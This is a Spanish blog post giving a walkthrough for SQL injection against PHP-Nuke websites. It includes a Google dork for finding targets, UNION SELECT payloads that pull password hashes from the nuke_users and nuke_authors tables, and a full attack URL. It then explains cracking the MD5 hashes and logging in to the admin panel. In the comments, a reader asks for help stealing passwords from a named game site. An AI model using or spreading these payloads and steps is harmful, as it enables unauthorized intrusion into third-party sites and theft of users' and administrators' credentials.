Skip navigation

Se trata de realizar una inyección de código en servidores con PHP-Nuke para obtener el hash de contraseñas de usuario y si tenemos suerte del administrador del site.

Realizariamos una búsqueda en Google con la siguiente sentencia: allinurl:modules.php?name=Search

y en la búsqueda, bien pasando los parámetros directamente en la URL o bien desde el propio buscador ejecutaríamos

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

O podríamos probar con

modules.php?name=Search&type=comments&%20%20%20query=&%20%20%
20query=
loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Y la sentencia quedaría así:

http://www.victima.com/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&
instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

con lo que obtendríamos el HASH seguido del usuario que ha publicado de la siguiente forma:

e141f494f13327099c5c6f9bd469a2f6
Enviado por webmaster el Wednesday, 31 December a las 15:59:59
Adjuntar al Artículo:
(0 responde)

Si tenemos la suerte de encontrar el hash enviado por webmaster tenemos más probabilidades de que el password coincida con el de administrador.

Todos los HASH que encontramos estarán encriptados con el algoritmo md5, con un MD5 Crack, webs con crackeador online o tablas Rainbow podremos desencriptarlo fácilmente.

Para entrar a la web de administración generalmente nos encontraremos con la siguiente URL:

http://www.victima.com/admin.php

Introducimos el usuario y contraseña obtenidos del nombre de usuario de publicación y el HASH desencriptado en MD5

User : webmaster
Pass : password

Anuncios

4 Comments

  1. no funciona olvidate sos un navo

  2. Si no me das una razón técnica no puedo entenderte, además no todas las versiones de PHP-Nuke son vulnerables.

  3. En tribalwars
    Se maneja el formato php
    la codificacion es UTF-8
    Sabes como ubicar las contraseñas
    de los jugadores o del administrador?
    No esta encriptado.

  4. Te doy el link:
    http://www.tribalwars.net


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: